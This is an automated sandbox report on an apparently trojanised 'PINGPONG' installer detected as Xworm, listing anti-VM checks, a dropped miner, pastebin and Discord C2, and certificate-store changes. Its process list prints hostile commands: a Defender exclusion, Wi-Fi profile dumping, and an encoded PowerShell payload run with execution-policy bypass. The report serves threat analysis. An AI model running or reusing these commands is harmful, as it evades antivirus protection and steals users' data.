Analysis Overview
SHA256
36ac4755489f5d4c7dedb4dd52e982bddceb6dddf33e033b14d0f19b2e49eed7
Threat Level: Known bad
The file PINGPONG-Setup-latest.exe was found to be: Known bad.
Malicious Activity Summary
Xworm
Detect Xworm Payload
Looks for VirtualBox drivers on disk
Looks for VirtualBox executables on disk
Enumerates VirtualBox DLL files
Enumerates VirtualBox registry keys
Looks for VirtualBox Guest Additions in registry
Identifies VirtualBox via ACPI registry values (likely anti-VM)
Looks for VMWare Tools registry key
Command and Scripting Interpreter: PowerShell
Looks for VMWare drivers on disk
Downloads MZ/PE file
Executes dropped EXE
Loads dropped DLL
Looks up external IP address via web service
Legitimate hosting services abused for malware hosting/C2
Checks installed software on the system
Detects Pyinstaller
Unsigned PE
Enumerates physical storage devices
Modifies registry key
Enumerates processes with tasklist
GoLang User-Agent
Suspicious use of WriteProcessMemory
Modifies system certificate store
Suspicious use of SendNotifyMessage
Creates scheduled task(s)
Suspicious use of SetWindowsHookEx
Runs ping.exe
Uses Task Scheduler COM API
Modifies registry class
Suspicious use of FindShellTrayWindow
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-05-29 22:48
Signatures
Detects Pyinstaller
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-05-29 22:48
Reported
2024-05-29 22:50
Platform
win11-20240426-en
Max time kernel
54s
Max time network
67s
Command Line
Signatures
Detect Xworm Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Xworm
Enumerates VirtualBox DLL files
| Description | Indicator | Process | Target |
| File opened (read-only) | C:\WINDOWS\system32\vboxdisp.dll | C:\Users\Admin\AppData\Local\Temp\PINGPONG-Setup-latest.exe | N/A |
| File opened (read-only) | C:\WINDOWS\system32\vboxmrxnp.dll | C:\Users\Admin\AppData\Local\Temp\PINGPONG-Setup-latest.exe | N/A |
| File opened (read-only) | C:\WINDOWS\system32\vboxoglcrutil.dll | C:\Users\Admin\AppData\Local\Temp\PINGPONG-Setup-latest.exe | N/A |
| File opened (read-only) | C:\WINDOWS\system32\vboxoglfeedbackspu.dll | C:\Users\Admin\AppData\Local\Temp\PINGPONG-Setup-latest.exe | N/A |
| File opened (read-only) | C:\WINDOWS\system32\vboxoglpassthroughspu.dll | C:\Users\Admin\AppData\Local\Temp\PINGPONG-Setup-latest.exe | N/A |
| File opened (read-only) | C:\WINDOWS\system32\vboxhook.dll | C:\Users\Admin\AppData\Local\Temp\PINGPONG-Setup-latest.exe | N/A |
| File opened (read-only) | C:\WINDOWS\system32\vboxogl.dll | C:\Users\Admin\AppData\Local\Temp\PINGPONG-Setup-latest.exe | N/A |
| File opened (read-only) | C:\WINDOWS\system32\vboxoglarrayspu.dll | C:\Users\Admin\AppData\Local\Temp\PINGPONG-Setup-latest.exe | N/A |
| File opened (read-only) | C:\WINDOWS\system32\vboxoglerrorspu.dll | C:\Users\Admin\AppData\Local\Temp\PINGPONG-Setup-latest.exe | N/A |
| File opened (read-only) | C:\WINDOWS\system32\vboxoglpackspu.dll | C:\Users\Admin\AppData\Local\Temp\PINGPONG-Setup-latest.exe | N/A |
Enumerates VirtualBox registry keys
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxGuest | C:\Users\Admin\AppData\Local\Temp\PINGPONG-Setup-latest.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxMouse | C:\Users\Admin\AppData\Local\Temp\PINGPONG-Setup-latest.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxService | C:\Users\Admin\AppData\Local\Temp\PINGPONG-Setup-latest.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxSF | C:\Users\Admin\AppData\Local\Temp\PINGPONG-Setup-latest.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxVideo | C:\Users\Admin\AppData\Local\Temp\PINGPONG-Setup-latest.exe | N/A |
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\RSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\PINGPONG-Setup-latest.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\PINGPONG-Setup-latest.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\FADT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\PINGPONG-Setup-latest.exe | N/A |
Looks for VirtualBox Guest Additions in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Oracle\VirtualBox Guest Additions | C:\Users\Admin\AppData\Local\Temp\PINGPONG-Setup-latest.exe | N/A |
Looks for VirtualBox drivers on disk
| Description | Indicator | Process | Target |
| File opened (read-only) | C:\WINDOWS\system32\drivers\VBoxSF.sys | C:\Users\Admin\AppData\Local\Temp\PINGPONG-Setup-latest.exe | N/A |
| File opened (read-only) | C:\WINDOWS\system32\drivers\VBoxVideo.sys | C:\Users\Admin\AppData\Local\Temp\PINGPONG-Setup-latest.exe | N/A |
| File opened (read-only) | C:\WINDOWS\system32\drivers\VBoxMouse.sys | C:\Users\Admin\AppData\Local\Temp\PINGPONG-Setup-latest.exe | N/A |
| File opened (read-only) | C:\WINDOWS\system32\drivers\VBoxGuest.sys | C:\Users\Admin\AppData\Local\Temp\PINGPONG-Setup-latest.exe | N/A |
Looks for VirtualBox executables on disk
| Description | Indicator | Process | Target |
| File opened (read-only) | C:\WINDOWS\system32\vboxservice.exe | C:\Users\Admin\AppData\Local\Temp\PINGPONG-Setup-latest.exe | N/A |
| File opened (read-only) | C:\WINDOWS\system32\vboxtray.exe | C:\Users\Admin\AppData\Local\Temp\PINGPONG-Setup-latest.exe | N/A |
| File opened (read-only) | C:\WINDOWS\system32\VBoxControl.exe | C:\Users\Admin\AppData\Local\Temp\PINGPONG-Setup-latest.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
Looks for VMWare Tools registry key
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\VMware, Inc.\VMware Tools | C:\Users\Admin\AppData\Local\Temp\PINGPONG-Setup-latest.exe | N/A |
Looks for VMWare drivers on disk
| Description | Indicator | Process | Target |
| File opened (read-only) | C:\WINDOWS\system32\drivers\vmmemctl.sys | C:\Users\Admin\AppData\Local\Temp\PINGPONG-Setup-latest.exe | N/A |
| File opened (read-only) | C:\WINDOWS\system32\drivers\vmci.sys | C:\Users\Admin\AppData\Local\Temp\PINGPONG-Setup-latest.exe | N/A |
| File opened (read-only) | C:\WINDOWS\system32\drivers\vmmouse.sys | C:\Users\Admin\AppData\Local\Temp\PINGPONG-Setup-latest.exe | N/A |
| File opened (read-only) | C:\WINDOWS\system32\drivers\vmhgfs.sys | C:\Users\Admin\AppData\Local\Temp\PINGPONG-Setup-latest.exe | N/A |
| File opened (read-only) | C:\WINDOWS\system32\drivers\vmusbmouse.sys | C:\Users\Admin\AppData\Local\Temp\PINGPONG-Setup-latest.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\ProgramData\rundll32.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\installer.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\temporary789373373\temp.bin | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Programs\PINGPONG\PINGPONG.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Programs\PINGPONG\resources\resources\miner-win32-x64.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Programs\PINGPONG\PINGPONG.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Programs\PINGPONG\PINGPONG.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Programs\PINGPONG\PINGPONG.exe | N/A |
Loads dropped DLL
Checks installed software on the system
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
| N/A | api.ipify.org | N/A | N/A |
| N/A | api.ipify.org | N/A | N/A |
Enumerates physical storage devices
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\tasklist.exe | N/A |
GoLang User-Agent
| Description | Indicator | Process | Target |
| HTTP User-Agent header | Go-http-client/1.1 | N/A | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\PINGPONG\URL Protocol | C:\Users\Admin\AppData\Local\Programs\PINGPONG\PINGPONG.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\PINGPONG\ = "URL:PINGPONG" | C:\Users\Admin\AppData\Local\Programs\PINGPONG\PINGPONG.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\PINGPONG\shell\open\command | C:\Users\Admin\AppData\Local\Programs\PINGPONG\PINGPONG.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\PINGPONG\shell | C:\Users\Admin\AppData\Local\Programs\PINGPONG\PINGPONG.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\PINGPONG\shell\open | C:\Users\Admin\AppData\Local\Programs\PINGPONG\PINGPONG.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\PINGPONG\shell\open\command\ = "\"C:\\Users\\Admin\\AppData\\Local\\Programs\\PINGPONG\\PINGPONG.exe\" \"%1\"" | C:\Users\Admin\AppData\Local\Programs\PINGPONG\PINGPONG.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\PINGPONG | C:\Users\Admin\AppData\Local\Programs\PINGPONG\PINGPONG.exe | N/A |
Modifies registry key
Modifies system certificate store
| Description | Indicator | Process | Target |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C\Blob = 0400000001000000100000003e455215095192e1b75d379fb187298a0f00000001000000140000005a6d07b6371d966a2fb6ba92828ce5512a49513d090000000100000068000000306606082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050508020206082b0601050507030606082b0601050507030706082b0601050507030906082b0601050507030106082b06010505070308530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520031000000620000000100000020000000ebd41040e4bb3ec742c9e381d31ef2a41a48b6685c96e7cef3c1df6cd4331c99140000000100000014000000607b661a450d97ca89502f7d04cd34a8fffcfd4b1d00000001000000100000006ee7f3b060d10e90a31ba3471b9992367f000000010000000c000000300a06082b060105050703097a000000010000000c000000300a06082b060105050703097e00000001000000080000000000042beb77d501030000000100000014000000b1bc968bd4f49d622aa89a81f2150152a41d829c190000000100000010000000a823b4a20180beb460cab955c24d7e21200000000100000079030000308203753082025da003020102020b040000000001154b5ac394300d06092a864886f70d01010505003057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f74204341301e170d3938303930313132303030305a170d3238303132383132303030305a3057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100da0ee6998dcea3e34f8a7efbf18b83256bea481ff12ab0b9951104bdf063d1e26766cf1cddcf1b482bee8d898e9aaf298065abe9c72d12cbab1c4c7007a13d0a30cd158d4ff8ddd48c50151cef50eec42ef7fce952f2917de06dd535308e5e4373f241e9d56ae3b2893a5639386f063c88695b2a4dc5a754b86c89cc9bf93ccae5fd89f5123c927896d6dc746e934461d18dc746b2750e86e8198ad56d6cd5781695a2e9c80a38ebf224134f73549313853a1bbc1e34b58b058cb9778bb1db1f2091ab09536e90ce7b3774b97047912251631679aeb1ae412608c8192bd146aa48d6642ad78334ff2c2ac16c19434a0785e7d37cf62168efeaf2529f7f9390cf0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e04160414607b661a450d97ca89502f7d04cd34a8fffcfd4b300d06092a864886f70d01010505000382010100d673e77c4f76d08dbfecbaa2be34c52832b57cfc6c9c2c2bbd099e53bf6b5eaa1148b6e508a3b3ca3d614dd34609b33ec3a0e363551bf2baefad39e143b938a3e62f8a263befa05056f9c60afd38cdc40b705194979804dfc35f94d515c914419cc45d7564150dff5530ec868fff0def2cb96346f6aafcdfbc69fd2e1248649ae095f0a6ef298f01b115b50c1da5fe692c6924781eb3a71c7162eecac897ac175d8ac2f847866e2ac4563195d06789852bf96ca65d469d0caa82e49951dd70b7db563d61e46ae15cd6f6fe3dde41cc07ae6352bf5353f42be9c7fdb6f7825f85d24118db81b3041cc51fa4806f1520c9de0c880a1dd66655e2fc48c9292669e0 | C:\ProgramData\rundll32.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C\Blob = 5c000000010000000400000000080000190000000100000010000000a823b4a20180beb460cab955c24d7e21030000000100000014000000b1bc968bd4f49d622aa89a81f2150152a41d829c7e00000001000000080000000000042beb77d5017a000000010000000c000000300a06082b060105050703097f000000010000000c000000300a06082b060105050703091d00000001000000100000006ee7f3b060d10e90a31ba3471b999236140000000100000014000000607b661a450d97ca89502f7d04cd34a8fffcfd4b620000000100000020000000ebd41040e4bb3ec742c9e381d31ef2a41a48b6685c96e7cef3c1df6cd4331c990b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520031000000530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000068000000306606082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050508020206082b0601050507030606082b0601050507030706082b0601050507030906082b0601050507030106082b060105050703080f00000001000000140000005a6d07b6371d966a2fb6ba92828ce5512a49513d0400000001000000100000003e455215095192e1b75d379fb187298a200000000100000079030000308203753082025da003020102020b040000000001154b5ac394300d06092a864886f70d01010505003057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f74204341301e170d3938303930313132303030305a170d3238303132383132303030305a3057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100da0ee6998dcea3e34f8a7efbf18b83256bea481ff12ab0b9951104bdf063d1e26766cf1cddcf1b482bee8d898e9aaf298065abe9c72d12cbab1c4c7007a13d0a30cd158d4ff8ddd48c50151cef50eec42ef7fce952f2917de06dd535308e5e4373f241e9d56ae3b2893a5639386f063c88695b2a4dc5a754b86c89cc9bf93ccae5fd89f5123c927896d6dc746e934461d18dc746b2750e86e8198ad56d6cd5781695a2e9c80a38ebf224134f73549313853a1bbc1e34b58b058cb9778bb1db1f2091ab09536e90ce7b3774b97047912251631679aeb1ae412608c8192bd146aa48d6642ad78334ff2c2ac16c19434a0785e7d37cf62168efeaf2529f7f9390cf0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e04160414607b661a450d97ca89502f7d04cd34a8fffcfd4b300d06092a864886f70d01010505000382010100d673e77c4f76d08dbfecbaa2be34c52832b57cfc6c9c2c2bbd099e53bf6b5eaa1148b6e508a3b3ca3d614dd34609b33ec3a0e363551bf2baefad39e143b938a3e62f8a263befa05056f9c60afd38cdc40b705194979804dfc35f94d515c914419cc45d7564150dff5530ec868fff0def2cb96346f6aafcdfbc69fd2e1248649ae095f0a6ef298f01b115b50c1da5fe692c6924781eb3a71c7162eecac897ac175d8ac2f847866e2ac4563195d06789852bf96ca65d469d0caa82e49951dd70b7db563d61e46ae15cd6f6fe3dde41cc07ae6352bf5353f42be9c7fdb6f7825f85d24118db81b3041cc51fa4806f1520c9de0c880a1dd66655e2fc48c9292669e0 | C:\ProgramData\rundll32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C | C:\ProgramData\rundll32.exe | N/A |
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\PINGPONG-Setup-latest.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Programs\PINGPONG\PINGPONG.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Programs\PINGPONG\PINGPONG.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Programs\PINGPONG\PINGPONG.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Programs\PINGPONG\PINGPONG.exe | N/A |
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Programs\PINGPONG\PINGPONG.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Programs\PINGPONG\PINGPONG.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Programs\PINGPONG\PINGPONG.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Programs\PINGPONG\PINGPONG.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Programs\PINGPONG\PINGPONG.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\temporary789373373\temp.bin | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\PINGPONG-Setup-latest.exe
"C:\Users\Admin\AppData\Local\Temp\PINGPONG-Setup-latest.exe"
C:\Users\Admin\AppData\Local\Temp\PINGPONG-Setup-latest.exe
"C:\Users\Admin\AppData\Local\Temp\PINGPONG-Setup-latest.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic bios get serialnumber"
C:\Windows\System32\Wbem\WMIC.exe
wmic bios get serialnumber
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic computersystem get model"
C:\Windows\System32\Wbem\WMIC.exe
wmic computersystem get model
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic computersystem get manufacturer"
C:\Windows\System32\Wbem\WMIC.exe
wmic computersystem get manufacturer
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "ping -w 4 google.com"
C:\Windows\system32\PING.EXE
ping -w 4 google.com
C:\Windows\SYSTEM32\netsh.exe
netsh wlan show profiles
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Add-MpPreference -ExclusionPath \"C:\ProgramData\""
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\ProgramData\rundll32.exe"
C:\ProgramData\rundll32.exe
C:\ProgramData\rundll32.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0